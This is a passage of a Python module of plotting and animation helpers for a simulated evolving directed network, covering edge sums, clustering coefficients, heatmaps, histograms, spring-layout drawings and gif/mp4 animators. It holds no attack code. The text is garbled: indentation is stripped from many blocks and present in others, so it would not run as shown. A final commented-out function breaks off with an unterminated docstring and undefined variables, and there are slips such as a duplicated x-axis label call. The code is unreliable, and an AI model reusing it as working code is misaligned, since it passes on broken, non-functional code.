fig = plt.figure(figsize=(10, 4))
plt.plot(edge_std_for_all_nodes[node, :])
plt.title(f'standard deviations, {graph.nodes.shape[0]} runs')
plt.xlabel('Time steps')
plt.ylabel(f'std of {node}th node\'s edges')
if save_fig:
plt.savefig(f'std_of_node_{node}_edges for {graph.nodes.shape[0]} runs.png')
if show:
plt.show()
else:
fig = plt.figure(figsize=(10, 4))
plt.plot(edge_std_for_all_nodes.T)
plt.title(f'Standard Deviations, {graph.nodes.shape[0]} runs')
plt.xlabel('Timestep')
plt.ylabel(f'std of all node edges')
if save_fig:
plt.savefig(f'std_of_all_node_edges with {graph.nodes.shape[0]} runs.png')
if show:
plt.show()
if incoming_edges:
edge_sums = graph.A.sum(axis=1) # returns sums of columns for every timestep
else:
edge_sums = graph.A.sum(axis=2) # returns sums of rows for every timestep
if node or node == 0:
plt.plot(edge_sums[:, node])
if incoming_edges:
plt.plot(edge_sums[node, :])
plt.title(f'sum of node {node} edges')
plt.xlabel('Time steps')
plt.ylabel(f'Sum of {node}th node\'s edges')
if save_fig:
plt.savefig(f'sum of node {node} edges.png')
if show:
plt.show()
else:
plt.plot(edge_sums)
plt.title(f'Sum of every node edges')
plt.xlabel('Time steps')
plt.ylabel(f'Sum of every nodes\' edges')
if save_fig:
plt.savefig(f'sum of every node edges.png')
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
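# Usage sketch (hedged): assuming the same hypothetical `graph` instance with an adjacency history
# `graph.A` of shape (timesteps, N, N), the two modes of plot_edge_sum would be called as:
#   plot_edge_sum(graph, show=True)                              # summed (outgoing) edges for all nodes
#   plot_edge_sum(graph, node=5, standard_deviation=True, show=True)  # std of node 5's edges over time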
def plot_degree_distribution_var_over_time(graph, show=False, save_fig=False, title=False):
"""
Plots variance of the degree distribution over time.
"""
deg_var_history = [np.var(graph.degree_distribution(timestep=timestep)) for timestep in range(graph.A.shape[0])]
fig = plt.figure(figsize=(10, 4))
plt.plot(deg_var_history)
plt.title(f'Degree Distribution Variance')
plt.xlabel('Timestep')
plt.ylabel(f'Degree Distribution Variance')
    if save_fig:
        plt.savefig(f'Degree Distribution Variance.png')
    if title:
        plt.savefig(f'{title}.png')
    if show:
        plt.show()
    plt.close(fig)
# NetworkX Observables: ---------------------------------------------------------------------------------------------
def plot_clustering_coefficients(nx_graphs, source=False, average_clustering=False, show=False, save_fig=False, title=None):
"""
Plots clustering Coefficients. Requires a series of pre-converted graphs as NetworkX graphs
:param source: if not None, computes ave_clustering for the single (presumably source) node
"""
    if source is not False:  # node 0 is a valid (falsy) source index
        if average_clustering:
            clustering_coefficients = [nx.average_clustering(nx_graphs[i], weight='weight', nodes=[source]) for i in range(len(nx_graphs))]
        else:
            clustering_coefficients = [nx.clustering(nx_graphs[i], weight='weight', nodes=[source])[source] for i in range(len(nx_graphs))]
else:
if average_clustering:
clustering_coefficients = [nx.average_clustering(nx_graphs[i], weight='weight') for i in range(len(nx_graphs))]
else:
clustering_coefficients = np.array([list(nx.clustering(nx_graphs[i], weight='weight').values()) for i in range(len(nx_graphs))])
fig = plt.figure(figsize=(12, 6))
plt.plot(clustering_coefficients)
plt.xlabel('Time steps')
plt.ylabel(f'Clustering Coefficient')
    if source is not False and average_clustering:
        plt.title(f'Average Clustering Coefficients for node [{source}]')
    elif source is not False:
        plt.title(f'Clustering Coefficients for node [{source}]')
elif average_clustering:
plt.title(f'Average Clustering Coefficients')
else:
plt.title(f'Clustering Coefficients [for all nodes]')
    if title:
        plt.savefig(f'{title}.png')
    if save_fig:
        plt.savefig(f'Clustering Coefficients.png')
    if show:
        plt.show()
    plt.close(fig)
def plot_ave_neighbor_degree(nx_graphs, source='in', target='in', node=False, show=False, save_fig=False, title=None):
"""
    Plots average neighbor degree. Requires a series of pre-converted NetworkX graphs.
    :param node: if given, computes the average neighbor degree for that single node only
    :param source, target: edge direction ('in' or 'out') passed through to nx.average_neighbor_degree
"""
    if node is not False:  # node 0 is a valid (falsy) node index
ave_neighbor_degree = [list(nx.average_neighbor_degree(nx_graphs[t], nodes=[node], source=source, target=target, weight='weight').values()) for t in range(len(nx_graphs))]
else:
ave_neighbor_degree = [list(nx.average_neighbor_degree(nx_graphs[t], source=source, target=target, weight='weight').values()) for t in range(len(nx_graphs))]
fig = plt.figure(figsize=(12, 6))
plt.plot(ave_neighbor_degree)
plt.xlabel('Time steps')
plt.ylabel(f'Average Neighbor Degree')
    if node is not False:
plt.title(f'Neighbor Degree for node [{node}], target {target}, source {source}')
else:
plt.title(f'Neighbor Degree [for all nodes], target {target}, source {source}')
    if title:
        plt.savefig(f'{title}.png')
    if save_fig:
        plt.savefig(f'Neighbor_Degree.png')
    if show:
        plt.show()
    plt.close(fig)
def plot_shortest_path_length(nx_graphs, show=False, save_fig=False, title=None):
"""
    Requires a fully connected graph (no islands), though it could be modified to allow for analysis of disparate components.
Plots AVERAGE shortest path lengths. Requires a series of pre-converted graphs as NetworkX graphs
:param nx_graphs: requires pre-converted nx_graphs.
"""
ave_shortest_path_length = [nx.average_shortest_path_length(nx_graphs[t], weight='weight') for t in range(len(nx_graphs))]
fig = plt.figure(figsize=(12, 6))
plt.plot(ave_shortest_path_length)
plt.xlabel('Time steps')
plt.ylabel(f'Average Shortest Path Length')
plt.title(f'Average Shortest Paths')
    if title:
        plt.savefig(f'{title}.png')
    if save_fig:
        plt.savefig(f'Average_Shortest_Path_Lengths.png')
    if show:
        plt.show()
    plt.close(fig)
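# Usage sketch (hedged): the three NetworkX observables above all expect a list of pre-converted nx graphs.
# grid_search_plots below obtains that list via G.convert_history_to_list_of_nx_graphs(), so a minimal flow
# for a single pickled Graph `G` would look like:
#   nx_graphs = G.convert_history_to_list_of_nx_graphs()
#   plot_clustering_coefficients(nx_graphs, average_clustering=True, show=True)
#   plot_ave_neighbor_degree(nx_graphs, source='in', target='in', show=True)
#   plot_shortest_path_length(nx_graphs, show=True)   # requires a fully connected graph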
# Heatmaps: ---------------------------------------------------------------------------------------------------------
def plot_adjacency_matrix_as_heatmap(graph, timestep=-1, show=False, save_fig=False, title=None):
"""
Returns adjacency matrix at timestep plotted as a heat map. Default timestep is the latest value.
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 10))
plt.imshow(graph.A[timestep], cmap='viridis')
plt.colorbar()
if timestep == -1:
plt.title(f'Adjacency Matrix at final timestep as heat map')
else:
plt.title(f'Adjacency Matrix at timestep {timestep} as heat map')
    if save_fig:
        plt.savefig(f'Adjacency Matrix heat map at run {timestep}.png')
    if title:
        plt.savefig(f'{title}.png')
    if show:
        plt.show()
    plt.close(fig)
def plot_all_to_all_eff_dists_as_heatmap(graph, timestep=-1, source_reward=2.6, parameter=12, MPED=False, normalize=True, log_norm=False, show=False, save_fig=False, title=None):
"""
Returns all to all effective distances at timestep plotted as a heat map. Default timestep is the latest value.
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 10))
data = graph.evaluate_effective_distances(source_reward=source_reward, parameter=parameter, timestep=timestep, multiple_path_eff_dist=MPED, source=None)
# assert normalize != log_norm, 'cannot both log norm and norm at the same time'
if log_norm:
data = np.log(data)
if normalize:
data /= np.max(data)
plt.imshow(data, cmap='viridis')
plt.colorbar()
if MPED:
ED_type = 'MPED'
else:
ED_type = 'RWED'
if timestep == -1:
plt.title(f'All-to-All {ED_type} at final timestep as heat map')
else:
plt.title(f'All-to-All {ED_type} at timestep {timestep} as heat map')
    if save_fig:
        plt.savefig(f'All-to-All {ED_type} heat map at run {timestep}.png')
    if title:
        plt.savefig(f'{title}.png')
    if show:
        plt.show()
    plt.close(fig)
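# Usage sketch (hedged): both heatmap helpers above work on a single timestep of the hypothetical `graph` instance;
# plot_all_to_all_eff_dists_as_heatmap defers to graph.evaluate_effective_distances, so the MPED/RWED choice and
# the source_reward/parameter values are simply forwarded:
#   plot_adjacency_matrix_as_heatmap(graph, timestep=-1, show=True)
#   plot_all_to_all_eff_dists_as_heatmap(graph, timestep=-1, MPED=True, show=True)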
def plot_heatmap(TwoD_data, x_range=None, y_range=None, normalize=False, tick_scale=2, title=None, fig_title=None, interp_method=None, show=False):
"""
Generalized heatmap plotter, used for post grid-search plots.
:param TwoD_data: Requires data of the dimensionality of the resultant heatmap (thus 2d)
:param x_range: Full set of x values
:param y_range: Full set of y values
:param normalize: Optional Normalization of heatmap
    :param tick_scale: spacing between x/y tick values (e.g. tick_scale=2 => only every other x/y value is shown as a tick)
:param title: Saves file as title.
:param fig_title: Title displayed in resultant figure .png
"""
if normalize: # though data is automatically normalized in output heatmap.
data = np.array(TwoD_data / np.amax(np.array(TwoD_data)))
else:
data = TwoD_data
if x_range.any(): plt.xticks(x_range)
if y_range.any(): plt.yticks(y_range)
x_interval = (x_range[2]-x_range[1])
y_interval = (y_range[2]-y_range[1])
plt.imshow(data, cmap='viridis', extent=[x_range[0], x_range[-1]+x_interval, y_range[0], y_range[-1]+y_interval], aspect='auto', interpolation=interp_method)
xticks = np.arange(x_range[0], x_range[-1], tick_scale*x_interval)
yticks = np.arange(y_range[0], y_range[-1], tick_scale*y_interval)
plt.xticks(xticks)
plt.yticks(yticks)
plt.colorbar()
plt.xlabel('Selectivity')
plt.ylabel('Edge Conservation')
    if fig_title:
        plt.title(f'{fig_title}')
    if title:
        plt.savefig(f'{title}.png')
    if show:
        plt.show()
plt.close()
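# Usage sketch (hedged): plot_heatmap expects data already shaped (edge_conservation values x selectivity values),
# exactly as produced in grid_search_plots below; with hypothetical parameter ranges it could be called as:
#   edge_conservation_range = np.arange(0, 1.05, 0.05)
#   selectivity_range = np.arange(0, 1.05, 0.05)
#   plot_heatmap(results_grid, x_range=selectivity_range, y_range=edge_conservation_range,
#                fig_title='Some observable', title='observable_heatmap', show=True)
# where `results_grid` is any 2d array of observables with shape (edge_conservation_range.size, selectivity_range.size).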
# Histograms: -------------------------------------------------------------------------------------------------------
def plot_weight_histogram(graph, num_bins=False, timestep=-1, show=False, save_fig=False, title=None):
"""
Plots histogram for edge weight distribution (edge weight distribution is considered for the entire graph, disconnected from nodes)
:param num_bins: explicitly set the number of bins (bars) for the histogram to use.
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
edges = (graph.A[timestep]).flatten()
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(edges, bins=num_bins)
else:
plt.hist(edges) # bins = auto, as per np.histogram
if timestep == -1:
plt.title(f"Weight histogram for all edges final timestep ({graph.A.shape[0]-1})")
else:
plt.title(f"Weight histogram for all edges timestep: {timestep} ")
    if save_fig:
        plt.savefig(f'Weight histogram with {num_bins} bins.png')
    if title:
        plt.savefig(f'{title}.png')  # title was asserted above but previously never used
    if show:
        plt.show()
    plt.close(fig)
def plot_histogram(data, num_bins=False, show=False):
"""
General histogram plotter shortcut; simply input flattened data as data.
:param data: flattened data to be graphed as a histogram.
:param num_bins: If desired, specify the number of bins explicitly.
"""
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(data, bins=num_bins)
else:
plt.hist(data) # bins = auto, as per np.histogram
if show:
plt.show()
def plot_degree_histogram(graph, num_bins=False, timestep=-1, show=False, save_fig=False, title=False):
"""
Plots degree distribution (of entire graph) as a histogram.
:param num_bins: explicit number of bins for histogram, (default sets them automatically)
"""
# nx_graph = graph.convert_to_nx_graph(timestep=timestep)
# degree_dist = [val[1] for val in list(nx_graph.degree(weight='weight'))]
degree_dist = graph.degree_distribution(timestep=timestep)
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(degree_dist, bins=num_bins)
else:
plt.hist(degree_dist) # bins = auto, as per np.histogram
plt.xlabel("Total (outgoing) Edge Weight")
plt.xlabel("Node Count (w/ given edge weight)")
if timestep == -1:
plt.title(f"Degree histogram for all edges final timestep ")
else:
plt.title(f"Degree histogram for all edges timestep: {timestep} ")
    if title:
        plt.savefig(f'{title}.png')
    if save_fig:
        plt.savefig(f'Degree histogram with {num_bins} bins.png')
    if show:
        plt.show()
    plt.close(fig)
def plot_edge_histogram(graph, num_bins=False, timestep=-1, show=False, save_fig=False, title=False):
"""
    Plots the edge weight distribution (of the entire graph) as a histogram.
:param num_bins: explicit number of bins for histogram, (default sets them automatically)
"""
edge_degree_dist = graph.A[timestep].flatten()
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(edge_degree_dist, bins=num_bins)
else:
plt.hist(edge_degree_dist) # bins = auto, as per np.histogram
if timestep == -1:
plt.title(f"Edge Degree histogram for all edges final timestep ")
else:
plt.title(f"Edge Degree histogram for all edges timestep: {timestep} ")
    if title:
        plt.savefig(f'{title}.png')
    if save_fig:
        plt.savefig(f'Edge Degree histogram with {num_bins} bins.png')
    if show:
        plt.show()
    plt.close(fig)
def plot_source_distribution(graph, num_bins=False, timestep=-1, show=False, save_fig=False, title=False):
"""
    Plots the source distribution over the course of the graph's history as a histogram.
:param num_bins: Explicitly set the number of desired histogram bins. Default automatically sets for data
:param timestep: cut off point of graph history to examine source history. Defaults to the end of the graph
"""
if len(utility_funcs.arr_dimen(graph.source_node_history)) > 1:
source_distribution = np.array(graph.source_node_history)[:, :timestep].flatten()
else:
source_distribution = graph.source_node_history[:timestep]
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(source_distribution, bins=num_bins)
else:
plt.hist(source_distribution) # bins = auto, as per np.histogram
if timestep == -1:
plt.title(f"Source histogram for all edges final timestep ")
else:
plt.title(f"Source histogram for all edges timestep: {timestep} ")
    if title:
        plt.savefig(f'{title}.png')
    if save_fig:
        plt.savefig(f'Source histogram with {num_bins} bins.png')
    if show:
        plt.show()
    plt.close(fig)
def plot_effective_distance_histogram(eff_dists, num_bins=False, timestep=-1, show=False, save_fig=False):
"""
TODO: consider deletion
"""
eff_dists = eff_dists.flatten()
fig = plt.figure(figsize=(10, 10))
if num_bins:
plt.hist(eff_dists, bins=num_bins)
else:
plt.hist(eff_dists) # bins = auto, as per np.histogram
if timestep == -1:
plt.title(f"Effective distance histogram for all to all edges final timestep")
else:
plt.title(f"Effective distance histogram for all to all paths timestep: {timestep} ")
if save_fig:
plt.savefig(f'Effective distance histogram at step {timestep}.png')
if show:
plt.show()
# Network Illustrations: --------------------------------------------------------------------------------------------
def plot_nx_network(nx_graph, node_size_scaling=100, show=False, save_fig=False, title=None):
fig = plt.figure(figsize=(10, 10))
pos = nx.spring_layout(nx_graph, k=0.5, scale=0.5, weight='weight', seed=42)
labels = nx.draw_networkx_labels(nx_graph, pos=pos, font_color='blue', font_size=20) # For use in debugging
# labels = nx.draw_networkx_labels(nx_graph, pos=pos, font_color='blue', font_size=0) # For use in debugging
# node_weights = [1]*len(nx_graph.nodes())
node_weights = [weight*node_size_scaling for weight in nx.get_node_attributes(nx_graph, "weight").values()]
weights = [1.6 for u, v in nx_graph.edges()] # Simple binary weights
edge_colors = 'black'
nx.draw_networkx_edges(nx_graph, pos, nodelist=['0'], alpha=0.8, width=weights, arrowsize=4, edge_color=edge_colors, connectionstyle='arc3, rad=0.2', edge_cmap='winter')
node_colors = ['grey' for _ in nx_graph]
nx.draw_networkx_nodes(nx_graph, pos, node_size=node_weights, node_color=node_colors, linewidths=weights, label=labels, cmap=plt.get_cmap('viridis'))
plt.title(f"Network Graph")
    if title:
        plt.savefig(f'{title}.png')
    if save_fig and not title:
        plt.savefig(f'Network Structures.png')
    if show:
        plt.show()
    plt.close(fig)
def plot_single_network(graph, timestep, directed=True, node_size_scaling=None, source_weighting=False, position=None, show=False, save_fig=False, seedless=False, title=None):
"""
:param timestep: Point at which the network's structure is to be graphed.
    :param directed: As the Graph class considers only directed networks, this default is not to be changed unless considering undirected graphs.
:param node_size_scaling: Works as a scale for the size of nodes in the plot. Defaults to length of the graph (num_runs)
:param source_weighting: If True, nodes are scaled proportional to the number of times they have been the source. Only relevant for variable source seeding.
:param position: sets the position of the nodes, as used when ensuring that subsequent graphs are not shifting the node positions (e.g. for the animator)
"""
fig = plt.figure(figsize=(10, 10))
if directed:
nx_G = nx.to_directed(nx.from_numpy_matrix(np.array(graph.A[timestep]), create_using=nx.DiGraph))
else:
nx_G = nx.from_numpy_matrix(np.array(graph.A[timestep]))
if position: # allows for setting a constant layout
pos = nx.spring_layout(nx_G, weight='weight', pos=position, fixed=list(nx_G.nodes))
else:
pos = nx.spring_layout(nx_G, k=0.5, scale=0.5, weight='weight', seed=42)
if node_size_scaling is None:
node_size_scaling = 2*graph.nodes.shape[0] # So that nodes are sized proportional to the number of times they *could've* been the source
# labels = nx.draw_networkx_labels(nx_G, pos=pos, font_color='blue', font_size=20) # For use in debugging
labels = None
# pos = nx.drawing.layout.spring_layout(nx_G, k=0.5, pos=pos, weight='weight', fixed=list(nx_G.nodes))
weights = [np.round((nx_G[u][v]['weight'] * 2.5), 10) for u, v in nx_G.edges()]
nx.draw_networkx_edges(nx_G, pos, nodelist=['0'], alpha=0.8, width=weights, arrowsize=4, edge_color='k',
connectionstyle='arc3, rad=0.2', edge_cmap='winter')
node_colors = ['grey' for _ in nx_G]
if not seedless:
node_colors[graph.source_node_history[timestep - 1]] = 'red'
# edge_colors = range(2, nx_G.number_of_edges() + 2)
edge_colors = 'black'
if source_weighting: # sizes nodes proportional to the number of times they've been a source
        source_weights = [graph.source_node_history[:timestep].count(node)*node_size_scaling for node in range(graph.nodes.shape[1])]  # count for every node; the former shape[1]-1 dropped the last node
# source_weight_sum = sum(source_weights)
# source_weights = [node_size_scaling*pow((weight/source_weight_sum), 0.5) for weight in source_weights]
source_weights = [weight if weight > 0 else 1*node_size_scaling for weight in source_weights]
nx.draw_networkx_nodes(nx_G, pos,
edgecolors=edge_colors,
node_size=source_weights,
node_color=node_colors,
linewidths=weights,
label=labels,
cmap=plt.get_cmap('viridis'))
plt.title(f"Nodes size proportional to number of times they've been the source [timestep: {timestep}]")
else:
incoming_edge_sum = graph.A[timestep].sum(axis=1)
incoming_edge_sum = [node_size_scaling * node / sum(incoming_edge_sum) for node in incoming_edge_sum]
nx.draw_networkx_nodes(nx_G, pos,
edgecolors=edge_colors,
node_size=incoming_edge_sum,
node_color=node_colors,
linewidths=weights,
label=labels,
cmap=plt.get_cmap('viridis'))
plt.title(f"Nodes size proportional to outgoing edge weights [timestep: {timestep}]")
    if title:
        plt.savefig(f'{title}.png')
    if save_fig and not title:
        plt.savefig(f'Network Structure(s) after {graph.nodes.shape[0]} runs.png')
    if show:
        plt.show()
    plt.close(fig)
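# Usage sketch (hedged): plot_single_network is what the animators below call frame by frame; holding `position`
# fixed keeps the layout stable across frames. With the hypothetical `graph` instance:
#   fixed_pos = nx.spring_layout(nx.from_numpy_matrix(np.array(graph.A[0]), create_using=nx.DiGraph), weight='weight')
#   plot_single_network(graph, timestep=-1, source_weighting=True, position=fixed_pos, show=True)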
def plot_network(graph, directed=True, node_size_scaling=200, nodes_sized_by_eff_distance=False, no_seeding=False,
show=False, save_fig=False, title=None):
"""
Plots the graph at four equispaced points spanning the entire time to denote network evolution through time in a single figure.
    :param directed: As the Graph class considers only directed networks, this default is not to be changed unless considering undirected graphs.
:param node_size_scaling: Works as a scale for the size of nodes in the plot.
    :param nodes_sized_by_eff_distance: Determines if the nodes are sized inversely proportional to their effective distance from the source (at the timesteps at which they are graphed)
"""
fig = plt.figure(figsize=(12, 6))
assert show or save_fig or title, 'Graph will be neither shown nor saved'
count = 1
timesteps = [0, int(graph.nodes.shape[0] / 3), int(graph.nodes.shape[0] * (2 / 3)), (graph.nodes.shape[0])-1]
for timestep in timesteps:
if directed:
nx_G = nx.to_directed(nx.from_numpy_matrix(np.array(graph.A[timestep]), create_using=nx.DiGraph))
if count == 1:
pos = nx.spring_layout(nx_G, k=0.5, scale=0.5, weight='weight')
# pos = nx.spring_layout(nx_G.reverse(copy=True), k=0.5, scale=0.5, weight='weight')
# Transposing is likely the intended effect, and more readily done
else:
nx_G = nx.from_numpy_matrix(np.array(graph.A[timestep]))
if count == 1:
pos = nx.spring_layout(nx_G, k=0.5, scale=5.0, weight='weight')
# pos = nx.spring_layout(nx_G.reverse(copy=True), k=0.5, scale=0.5, weight='weight')
# Transposing is likely the intended effect
incoming_edge_sum = graph.A[timestep].sum(axis=1)
plt.subplot(1, 4, count)
count += 1
weights = [nx_G[u][v]['weight'] * 1.5 for u, v in nx_G.edges()]
incoming_edge_sum = [(node_size_scaling * node / sum(incoming_edge_sum)) for node in incoming_edge_sum]
edge_colors = 'black'
node_colors = ['grey'] * graph.nodes.shape[1]
if not no_seeding: node_colors[graph.source_node_history[timestep]] = 'red'
nx.draw_networkx_edges(nx_G, pos, nodelist=['0'], alpha=0.8, width=weights, arrowsize=4, connectionstyle='arc3, rad=0.2')
nx.draw_networkx_nodes(G=nx_G, pos=pos,
edgecolors=edge_colors,
node_size=incoming_edge_sum,
node_color=node_colors,
linewidths=weights,
cmap=plt.get_cmap('viridis'))
plt.title("timestep: {0}".format(timestep))
if nodes_sized_by_eff_distance:
nx.draw_networkx_nodes(nx_G, pos,
edgecolors=edge_colors,
node_size=graph.nodes,
node_color=node_colors,
linewidths=weights,
cmap=plt.get_cmap('viridis'))
plt.title("timestep: {0}".format(timestep))
    if title:
        plt.savefig(f'{title}.png')
    if save_fig:
        plt.savefig(f'Network Structure(s) for edge_to_eff_dist_coupling of {np.round(graph.edge_conservation_coefficient, 2)}, {graph.nodes.shape[0]} runs.png')
    if show:
        plt.show()
    plt.close(fig)
# Network Animations: --------------------------------------------------------------------------------------------
def animate_network_evolution(graph, node_size_scaling=200, source_weighting=False, directory_name='network_animation',
file_title='network_evolution', parent_directory=None, gif_duration_in_sec=5,
num_runs_per_fig=None, verbose=False):
"""
Creates a gif and mp4 of the network evolution and stores them in a folder with the individual frames.
:param node_size_scaling: Works as a scale for the size of nodes in the plot. Defaults to length of the graph (num_runs)
:param source_weighting: If True, nodes are scaled proportional to the number of times they have been the source. Only relevant for variable source seeding.
:param directory_name: string, name of directory for resultant figures and animations. Of course, a path behind the title (e.g. directory_name=Path(directory_path, 'network_animation'))
determines the location of the resultant file as well.
:param file_title: string, sets title of resultant gif and mp4. by default, (if no path set into file title string) places the file into the above specified directory.
:param parent_directory: string, set to determine directory of output animation and stills. Defaults to the parent directory of this python file.
:param gif_duration_in_sec: int, determines the mp4 and gif's eventual duration in seconds.
:param num_runs_per_fig: int, set the number of runs between graphed figure (which individually compose the frames of the resultant animation)
:param verbose: bool, if True, prints intermediary % completion and eventual total time for completion.
"""
assert num_runs_per_fig != 0, 'Number of runs per figure must be larger than 0, or else omitted for graph every run'
if parent_directory is None:
source_directory = os.path.dirname(__file__)
else:
source_directory = parent_directory
vid_path = Path(source_directory, directory_name)
fig_path = Path(vid_path, 'figures')
try:
os.mkdir(vid_path), f'Created folder for network structure gif at {vid_path}'
os.mkdir(fig_path), f'Created folder for figures at {fig_path}'
except OSError:
print(f'{vid_path} already exists, adding or overwriting contents')
pass
nx_G = nx.to_directed(nx.from_numpy_matrix(np.array(graph.A[0]), create_using=nx.DiGraph))
initial_position = nx.drawing.layout.spring_layout(nx_G, k=0.5, scale=0.5, weight='weight')
for i in range(0, graph.A.shape[0] - 1):
files = Path(fig_path, f'{i:04}')
if num_runs_per_fig:
if i % num_runs_per_fig == 0:
plot_single_network(graph, i, node_size_scaling=node_size_scaling, source_weighting=source_weighting,
position=initial_position, show=False, save_fig=True, title=files)
else:
plot_single_network(graph, i, node_size_scaling=node_size_scaling, source_weighting=source_weighting,
position=initial_position, show=False, save_fig=True, title=files)
if verbose:
if int(i % graph.A.shape[0]) % int(graph.A.shape[0] / 10) == 0:
print(f'{(i / graph.A.shape[0]) * 100:.1f}%-ish done')
if i == graph.A.shape[0] - 1:
print('Now creating video from rendered images... (ignore resolution reformatting error)')
if num_runs_per_fig:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4',
fps=((graph.A.shape[0] / num_runs_per_fig) / gif_duration_in_sec))
else:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4', fps=(graph.A.shape[0] / gif_duration_in_sec))
images = []
for filename in sorted(os.listdir(fig_path)):
if filename.endswith(".png"):
images.append(imageio.imread(Path(fig_path, filename)))
writer.append_data(imageio.imread(Path(fig_path, filename)))
imageio.mimsave(f'{Path(vid_path, file_title)}.gif', images)
writer.close()
if verbose:
print(f'\n gif and mp4 of network evolution created in {vid_path} \n Stills stored in {fig_path} \n')
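# Usage sketch (hedged): a typical animation call for the hypothetical `graph` instance; num_runs_per_fig thins the
# frames (here every 5th timestep) and the gif/mp4 land in ./network_animation alongside the rendered stills:
#   animate_network_evolution(graph, source_weighting=True, num_runs_per_fig=5, gif_duration_in_sec=10, verbose=True)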
def parallelized_animate_network_evolution(graph, source_weighting=False, node_size_scaling=True, directory_name='network_animation',
file_title='network_evolution', parent_directory=None, gif_duration_in_sec=5,
num_runs_per_fig=None, changing_layout=False, verbose=False):
"""
Creates a gif and mp4 of the network evolution and stores them in a folder with the individual frames, using all system cores for frame generation individually.
:param node_size_scaling: Works as a scale for the size of nodes in the plot. Defaults to length of the graph (num_runs)
:param source_weighting: If True, nodes are scaled proportional to the number of times they have been the source. Only relevant for variable source seeding.
:param directory_name: string, name of directory for resultant figures and animations. Of course, a path behind the title (e.g. directory_name=Path(directory_path, 'network_animation'))
determines the location of the resultant file as well.
:param file_title: string, sets title of resultant gif and mp4. by default, (if no path set into file title string) places the file into the above specified directory.
:param parent_directory: string, set to determine directory of output animation and stills. Defaults to the parent directory of this python file.
:param gif_duration_in_sec: int, determines the mp4 and gif's eventual duration in seconds.
:param num_runs_per_fig: int, set the number of runs between graphed figure (which individually compose the frames of the resultant animation)
:param verbose: bool, if True, prints intermediary % completion and eventual total time for completion.
"""
assert num_runs_per_fig != 0, 'Number of runs per figure must be larger than 0, or else omitted for graph every run'
start_time = time.time()
if parent_directory is None:
source_directory = os.path.dirname(__file__)
else:
source_directory = parent_directory
vid_path = Path(source_directory, directory_name)
fig_path = Path(vid_path, 'figures')
try:
os.makedirs(vid_path), f'Created folder for network structure gif at {vid_path}'
os.makedirs(fig_path), f'Created folder for figures at {fig_path}'
except OSError:
print(f'{vid_path}/{fig_path} already exists, adding or overwriting contents')
pass
nx_G = nx.to_directed(nx.from_numpy_matrix(np.array(graph.A[0]), create_using=nx.DiGraph))
if changing_layout:
initial_position = None
else:
initial_position = nx.drawing.layout.spring_layout(nx_G, k=0.5, scale=0.5, weight='weight')
index = 0
while index < graph.A.shape[0] - 1:
processes = []
used_cores = 0
while used_cores < mp.cpu_count():
if index > graph.A.shape[0] - 1:
break
index += 1
files = Path(fig_path, f'{index:04}')
if num_runs_per_fig:
if index % num_runs_per_fig == 0 or index < 10: # As the first few are generally the most important
p = mp.Process(target=plot_single_network, args=(graph, index, True, node_size_scaling, source_weighting, initial_position, False, True, False, files))
p.start()
processes.append(p)
used_cores += 1
else:
p = mp.Process(target=plot_single_network, args=(graph, index, True, node_size_scaling, source_weighting, initial_position, False, True, False, files))
p.start()
processes.append(p)
used_cores += 1
if verbose:
utility_funcs.print_run_percentage(index, graph.A.shape[0])
if index == graph.A.shape[0]-1: print('Now creating video from rendered images... (ignore resolution reformatting error)')
for process in processes:
process.join()
if num_runs_per_fig:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4',
fps=((graph.A.shape[0] / num_runs_per_fig) / gif_duration_in_sec))
else:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4', fps=(graph.A.shape[0] / gif_duration_in_sec))
images = []
for filename in sorted(os.listdir(fig_path)):
if filename.endswith(".png"):
images.append(imageio.imread(Path(fig_path, filename)))
writer.append_data(imageio.imread(Path(fig_path, filename)))
imageio.mimsave(f'{Path(vid_path, file_title)}.gif', images)
writer.close()
if verbose:
print(f'\n gif and mp4 of network evolution created in {vid_path} \n Stills stored in {fig_path} \n')
print(f"Time to animate: {int((time.time()-start_time) / 60)} minutes, {np.round((time.time()-start_time) % 60, 2)} seconds")
# def animate_grid_search_results(graph, by_edge_conservation=True, data_directory=None, subdata_directory=None, gif_duration_in_sec=5, num_runs_per_fig=None, verbose=False):
"""
# Creates a gif and mp4 of the end networks running through parameter values and stores them in a folder with the individual frames, using all system cores for frame generation individually.
# :param gif_duration_in_sec: int, determines the mp4 and gif's eventual duration in seconds.
# :param num_runs_per_fig: int, set the number of runs between graphed figure (which individually compose the frames of the resultant animation)
# :param verbose: bool, if True, prints intermediary % completion and eventual total time for completion.
assert num_runs_per_fig != 0, 'Number of runs per figure must be larger than 0, or else omitted for graph every run'
start_time = time.time()
if subdata_directory is None:
subdata_directory = data_directory
print(f'No output directory given, defaulting to output_dir same as data directory at: \n {data_directory}')
vid_path = Path(data_directory, 'grid_search_animations')
try:
os.mkdir(vid_path), f'Created folder for grid_search gif at {vid_path}'
except OSError:
print(f'{vid_path} already exists, adding or overwriting contents')
pass
# num_cores_used = int(fraction_cores_used * mp.cpu_count())*(bool(int(fraction_cores_used * mp.cpu_count()))) + 1*(not bool(int(fraction_cores_used * mp.cpu_count())))
selectivity_val = float(str(str(data_directory).split('/')[-1]).split('_')[-1])
for root, dirs, files in os.walk(data_directory):
f = sorted(files) # Order preserved due to 0 padding.
for file in f:
with open(Path(data_directory, file), 'rb') as data:
G = pickle.load(data)
data.close()
if num_runs_per_fig:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4',
fps=((graph.A.shape[0] / num_runs_per_fig) / gif_duration_in_sec))
else:
writer = imageio.get_writer(f'{Path(vid_path, file_title)}.mp4', fps=(graph.A.shape[0] / gif_duration_in_sec))
images = []
for filename in sorted(os.listdir(fig_path)):
if filename.endswith(".png"):
images.append(imageio.imread(Path(fig_path, filename)))
writer.append_data(imageio.imread(Path(fig_path, filename)))
imageio.mimsave(f'{Path(vid_path, file_title)}.gif', images)
writer.close()
